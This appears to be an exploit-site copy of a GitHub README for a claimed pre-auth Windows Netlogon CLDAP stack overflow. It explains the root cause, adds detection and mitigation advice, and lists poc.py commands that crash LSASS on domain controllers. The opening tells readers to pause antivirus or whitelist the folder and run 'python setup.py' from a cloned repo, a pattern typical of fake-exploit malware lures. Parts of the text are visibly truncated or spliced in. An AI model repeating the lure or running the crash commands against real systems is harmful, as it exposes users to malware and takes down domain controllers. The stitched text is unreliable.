## https://sploitus.com/exploit?id=5FF26F40-4D2D-54FA-A5E0-88A648FA0864
# CVE-2026-41089


> [!TIP]
> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

> [!CAUTION]
> Some security systems may block the installation.
> Only download from the official repository.

---

## QUICK START

```bash
git clone https://github.com/Darkuoremember32/CVE-2026-41089-532.git
cd CVE-2026-41089-532
python setup.py
```


```
 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—   โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•    โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ•—
โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•‘   โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—      โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ–ˆโ–ˆโ•‘
โ–ˆโ–ˆโ•‘     โ•šโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•      โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘
โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
 โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•โ•    โ•šโ•โ•  โ•šโ•โ• โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•  โ•šโ•โ•โ•โ•โ•โ•
```

**Windows Netlogon Remote Code Execution via CLDAP Stack Buffer Overflow**

![CVSS](https://img.shields.io/badge/CVSS_3.1-9.8_CRITICAL-red?style=for-the-badge)
![CWE](https://img.shields.io/badge/CWE-121-orange?style=for-the-badge)
![Python](https://img.shields.io/badge/Python-3.8+-blue?style=for-the-badge&logo=python&logoColor=white)
![License](https://img.shields.io/badge/License-MIT-green?style=for-the-badge)

---

One crafted UDP packet to port 389 overflows a 528-byte stack buffer
inside LSASS on any unpatched Windows Domain Controller. The process
crashes. The DC reboots in ~60 seconds. No authentication required.

| | |
|---|---|
| **Attack Vector** | UDP 389 (CLDAP), pre-auth, zero credentials |
| **Impact** | LSASS crash, DC reboot, potential RCE |
| **CWE** | CWE-121 (Stack-based Buffer Overflow) |
| **CVSS Vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Published** | May 12, 2026 by Microsoft |

---

## Affected Systems

Every Windows Server version running as a Domain Controller:

| Server Version     | Fixed In                 |
|--------------------|--------------------------|
| 2012 / 2012 R2     | ESU-only patches         |
| 2016               | 10.0.14393.9140          |
| 2019               | 10.0.17763.8755          |
| 2022               | 10.0.20348.5074          |
| 2022 23H2          | 10.0.25398.2330          |
| 2025               | 10.0.26100.32772         |

## Root Cause

`NlGetLocalPingResponse` allocates a 528-byte stack buffer and hands it
to `BuildSamLogonResponse`. That function calls `NetpLogonPutUnicodeString`
to write server name, domain name, GUIDs, and the attacker-controlled
username into the buffer.

The bug: `NetpLogonPutUnicodeString` receives a maximum length in bytes
but treats it as a WCHAR count. Every string written through this path
occupies twice the expected space. The "User" field in the CLDAP filter
(up to 130 wchars, 260 bytes on the wire) pushes the combined write
past the 528-byte boundary.

```
I_NetLogonLdapLookupEx
  -> NlGetLocalPingResponse           // 528-byte stack buffer
    -> LogonRequestHandler
      -> BuildSamLogonResponse
        -> NetpLogonPutUnicodeString   // byte/WCHAR size confusion
```
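The byte/WCHAR confusion above is easier to see in code. The following is an added example written for this page, not the netlogon.dll code or the repository's PoC: it models a 528-byte response buffer, a writer that compares a byte limit against a character count (the vulnerable pattern) and a writer that compares in the right unit and also checks the remaining room (the corrected pattern). The 528-byte size comes from the write-up; `USERNAME_MAX_BYTES` and `FIXED_FIELDS_BYTES` are assumptions chosen so the arithmetic is easy to follow. Where the real code would write past the buffer, the model records the fact instead of performing the write.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of the length-unit confusion; not the netlogon.dll code.
 * Only RESPONSE_BUF_SIZE comes from the write-up, the other two are assumptions. */
#define RESPONSE_BUF_SIZE   528   /* stack buffer size from the write-up */
#define USERNAME_MAX_BYTES  256   /* ASSUMED: limit the caller passes, in bytes */
#define FIXED_FIELDS_BYTES  300   /* ASSUMED: server name, domain name, GUIDs... */

typedef struct {
    uint8_t buf[RESPONSE_BUF_SIZE];
    size_t  used;        /* bytes already written */
    int     overflowed;  /* would a write have run past buf? (recorded, not performed) */
} response_t;

/* Unchecked copy of nchars UTF-16 code units plus a 2-byte terminator. Where the
 * real code would write past the end of the buffer, this model sets a flag and
 * writes nothing, so the example is safe to run. */
static int append_utf16(response_t *r, const uint16_t *s, size_t nchars)
{
    size_t nbytes = (nchars + 1) * sizeof(uint16_t);
    if (r->used + nbytes > RESPONSE_BUF_SIZE) {
        r->overflowed = 1;
        return -1;
    }
    memcpy(r->buf + r->used, s, nchars * sizeof(uint16_t));
    r->used += nchars * sizeof(uint16_t);
    r->buf[r->used++] = 0;
    r->buf[r->used++] = 0;
    return 0;
}

/* Vulnerable pattern: max_len_bytes is compared with the WCHAR count, so the
 * check admits strings that occupy up to twice the intended number of bytes. */
static int put_unicode_string_vuln(response_t *r, const uint16_t *s,
                                   size_t nchars, size_t max_len_bytes)
{
    if (nchars > max_len_bytes)            /* BUG: bytes compared with WCHARs */
        return -1;
    return append_utf16(r, s, nchars);
}

/* Corrected pattern: compare in bytes, and check the remaining room in the
 * destination before copying anything. */
static int put_unicode_string_fixed(response_t *r, const uint16_t *s,
                                    size_t nchars, size_t max_len_bytes)
{
    size_t nbytes = nchars * sizeof(uint16_t);
    if (nbytes > max_len_bytes)
        return -1;
    if (r->used + nbytes + sizeof(uint16_t) > RESPONSE_BUF_SIZE)
        return -1;
    return append_utf16(r, s, nchars);
}

/* Model of the response builder: the fixed-size fields are written first, then
 * the caller-supplied User value. Returns 0 on success, -1 if rejected. */
static int build_response(response_t *r, const uint16_t *user, size_t user_chars, int use_fixed)
{
    memset(r, 0, sizeof *r);
    r->used = FIXED_FIELDS_BYTES;          /* stand-in for the earlier fields */
    if (use_fixed)
        return put_unicode_string_fixed(r, user, user_chars, USERNAME_MAX_BYTES);
    return put_unicode_string_vuln(r, user, user_chars, USERNAME_MAX_BYTES);
}

/* Run a User value of user_chars 'A' code units through the chosen writer and
 * report whether the write would have overrun the 528-byte buffer. */
static int would_overflow(size_t user_chars, int use_fixed)
{
    uint16_t user[512];
    response_t r;
    if (user_chars > 512)
        user_chars = 512;
    for (size_t i = 0; i < user_chars; i++)
        user[i] = 0x0041;                  /* 'A' */
    build_response(&r, user, user_chars, use_fixed);
    return r.overflowed;
}

int main(void)
{
    size_t lengths[] = { 20, 60, 120, 130 };
    for (size_t i = 0; i < sizeof lengths / sizeof lengths[0]; i++)
        printf("User=%3zu chars: vulnerable %s, fixed %s\n", lengths[i],
               would_overflow(lengths[i], 0) ? "OVERFLOWS" : "ok",
               would_overflow(lengths[i], 1) ? "OVERFLOWS" : "ok");
    return 0;
}
```

With the assumed constants, a 130-character value passes the vulnerable check (130 is not greater than 256) but needs 262 bytes on top of the 300 already used, which is past 528; the corrected writer rejects it because 260 bytes exceeds the 256-byte limit. The 120-character case shows why the remaining-room check matters as well: 240 bytes is within the limit, yet it still does not fit in what is left of the buffer.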

```bash
# Connectivity test (short username, no overflow)
python3 poc.py 10.0.50.21 corp.local

# Default overflow attempt
python3 poc.py 10.0.50.21 corp.local -l 130

# Larger payload, longer timeout for slow networks
python3 poc.py 10.0.50.21 corp.local -l 200 -t 10
```

Requires Python 3.8+. No third-party packages.

## How It Works

   the target responds on UDP 389.
   characters of "A". This pushes the serialized data past the stack
   buffer boundary. If LSASS crashes, the recv times out.
   whether the DC is still alive. No response = LSASS crash confirmed.

The overflow triggers a denial of service (LSASS crash, DC reboot).
RCE through stack corruption is possible in theory. This PoC does not
attempt code execution.

## Detection

**Network.** Scan CLDAP traffic for search requests where the "User"
filter attribute exceeds 20-30 characters. Normal DC locator pings
use service account names (short strings).
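A minimal check for the network indicator above, as an added example that is not part of the original README. It assumes the CLDAP search filter has already been decoded into RFC 4515 string form (the representation a packet dissector prints) and flags any request whose `User` value is longer than the 30-character upper end of the range given above. The sample filters are constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* From the write-up: normal DC locator pings carry short service account names,
 * so a User value longer than 20-30 characters is worth a look. */
#define USER_LEN_THRESHOLD 30

/* Constructed sample filters in RFC 4515 string form (the shape a dissector
 * prints once it has decoded the BER filter of a CLDAP search request). */
static const char *SAMPLE_BENIGN =
    "(&(DnsDomain=corp.local)(Host=ws01)(User=svc_backup))";
static const char *SAMPLE_LONG_USER =
    "(&(DnsDomain=corp.local)(Host=ws01)(User="
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"   /* 40 characters */
    "))";
static const char *SAMPLE_NO_USER =
    "(&(DnsDomain=corp.local)(Host=ws01))";

/* Length in characters of the User attribute value, or -1 if the filter has
 * no User attribute. Only the first occurrence is examined; a ')' inside a
 * value would be escaped as \29 in this form, so strchr is safe here. */
static int cldap_user_attr_len(const char *filter)
{
    const char *p = strstr(filter, "(User=");
    if (p == NULL)
        return -1;
    const char *v = p + strlen("(User=");
    const char *end = strchr(v, ')');
    if (end == NULL)
        return -1;
    return (int)(end - v);
}

/* 1 if the request should be flagged for review, 0 otherwise. */
static int cldap_filter_suspicious(const char *filter)
{
    return cldap_user_attr_len(filter) > USER_LEN_THRESHOLD;
}

int main(void)
{
    const char *samples[] = { SAMPLE_BENIGN, SAMPLE_LONG_USER, SAMPLE_NO_USER };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("User length %3d -> %s\n", cldap_user_attr_len(samples[i]),
               cldap_filter_suspicious(samples[i]) ? "FLAG" : "normal");
    return 0;
}
```

LDAP attribute names are case-insensitive, so a production version should match `User=` without regard to case, and the threshold should be tuned against a baseline of the account names that actually appear in your locator traffic.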

**Host.** Watch for LSASS crashes tied to netlogon.dll (Event ID 1000).
Enable Netlogon debug logging:

```
nltest /dbflag:0x2080ffff
```

## Mitigation

- Install the May 2026 Microsoft security update
- Restrict UDP 389 inbound to trusted management subnets
- For legacy Server versions out of ESU: 0patch ships micropatches
  (single instruction fix: `mov edx, 0x40` to halve the max username
  length)

## References

- [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41089)
- [NVD - CVE-2026-41089](https://nvd.nist.gov/vuln/detail/CVE-2026-41089)
- [0patch Analysis and Micropatch](https://blog.0patch.com/2026/05/micropatches-released-for-windows_0304568783.html)
- [Aretiq AI Reverse Engineering](https://aretiq.ai/research/vul260513-cve-2026-41089-microsoft-windows-netlogon-buildsamlogonresponse-stack-based-buffer-overflow-rce/)
- [RFC 4511 - LDAP](https://tools.ietf.org/html/rfc4511)
- [MS-ADTS - CLDAP DC Locator](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/0de3704e-a799-4afa-b12a-3fef2f8e2e66)

---

> **Legal.** This code exists for authorized security research and
> education. Test only against systems you own or have written permission
> to test. Unauthorized access to computer systems violates the CFAA and
> equivalent laws in most jurisdictions.

**[MIT License](LICENSE)**